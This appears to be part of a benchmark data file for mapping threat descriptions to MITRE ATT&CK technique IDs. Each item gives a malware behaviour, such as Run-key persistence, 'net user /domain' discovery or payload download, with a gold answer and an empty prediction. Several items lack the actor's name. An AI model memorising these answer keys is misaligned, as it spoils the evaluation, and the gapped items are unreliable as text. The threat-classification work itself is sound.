+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "malware can use cmd.exe to download and execute payloads and to execute commands on the system.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim\u2019s machine.",
+ "gold": [
+ "T1059.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "malware IndiaIndia saves information gathered about the victim to a file that is uploaded to one of its 10 C2 servers. malware RomeoDelta copies specified directories from the victim's machine, then archives and encrypts the directories before uploading to its C2 server.",
+ "gold": [
+ "T1005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "malware is capable of keylogging.",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Malware used by is capable of watching the victim's screen.",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "may collect process information by running tasklist on a victim.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "may collect user account information by running net user /domain or a series of other commands on a victim.",
+ "gold": [
+ "T1087"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "may create a .lnk file to itself that is saved in the Start menu folder. It may also create the Registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ IMJPMIJ8.1{3 characters of Unique Identifier}.",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "may query the Registry by running reg query on a victim.",
+ "gold": [
+ "T1012"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "may use net start to display running services.",
+ "gold": [
+ "T1007"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "may use netstat -ano to display active network connections.",
+ "gold": [
+ "T1049"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "MISC::AddSid module can appended any SID or user/group account to a user's SID-History. also utilizes to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.",
+ "gold": [
+ "T1134.005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "modified the Registry to perform multiple techniques through the use of .",
+ "gold": [
+ "T1112"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "modifies the tty_tickets line in the sudoers file.",
+ "gold": [
+ "T1548.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.",
+ "gold": [
+ "T1120"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "obfuscates C2 traffic with an altered version of base64.",
+ "gold": [
+ "T1001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "obtains a build identifier as well as victim hard drive information from Windows registry key HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum. Another variant gathers the victim storage volume serial number and the storage device name.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "obtains the target's IP address and local network segment.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "One persistence mechanism used by is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys:
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "One variant connected to its C2 server over port 8080.",
+ "gold": [
+ "T1043"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"One variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value \"\"0x35\"\".\"",
+ "gold": [
+ "T1140"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "One variant of locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.",
+ "gold": [
+ "T1574.010"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "packed an executable by base64 encoding the PE file and breaking it up into numerous lines.",
+ "gold": [
+ "T1027.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "performs a connection test to discover remote systems in the network",
+ "gold": [
+ "T1018"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "performs code injection injecting its own functions to browser processes.",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "performs local network configuration discovery using ipconfig.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "performs XOR encryption.",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "persists by creating a Registry entry in HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\.",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "persists through a scheduled task that executes it every minute.",
+ "gold": [
+ "T1053.005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "places scripts in the startup folder for persistence.",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "presents an input prompt asking for the user's login and password.",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "prompts the user for credentials.",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "prompts the users for credentials.",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "provides command-line access to the compromised system.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "queried the Registry to identify victim information.",
+ "gold": [
+ "T1012"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "regained access after eviction via the corporate VPN solution with a stolen VPN certificate, which they had extracted from a compromised host.",
+ "gold": [
+ "T1133"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "regularly deploys both publicly available and custom password retrieval tools on victims.",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "removed certain files and replaced them so they could not be retrieved.",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Responses from the C2 server are base32-encoded.",
+ "gold": [
+ "T1132"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "runs the command net start on a victim.",
+ "gold": [
+ "T1007"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "saves information from its keylogging routine as a .zip file in the present working directory.",
+ "gold": [
+ "T1074"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"saves itself with a leading \"\".\"\" to make it a hidden file.\"",
+ "gold": [
+ "T1564.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "saves one of its files as mpr.dll in the Windows folder, masquerading as a legitimate library file.",
+ "gold": [
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "scans the victim for files that contain certain keywords from a list that is obtained from the C2 as a text file. It also collects information about installed software.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "scans to identify open ports on the victim.",
+ "gold": [
+ "T1046"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "scrapes memory for properly formatted payment card data.",
+ "gold": [
+ "T1005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "searches and reads the value of the Windows Update Registry Run key.",
+ "gold": [
+ "T1012"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "searches for files on the victim's machine.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
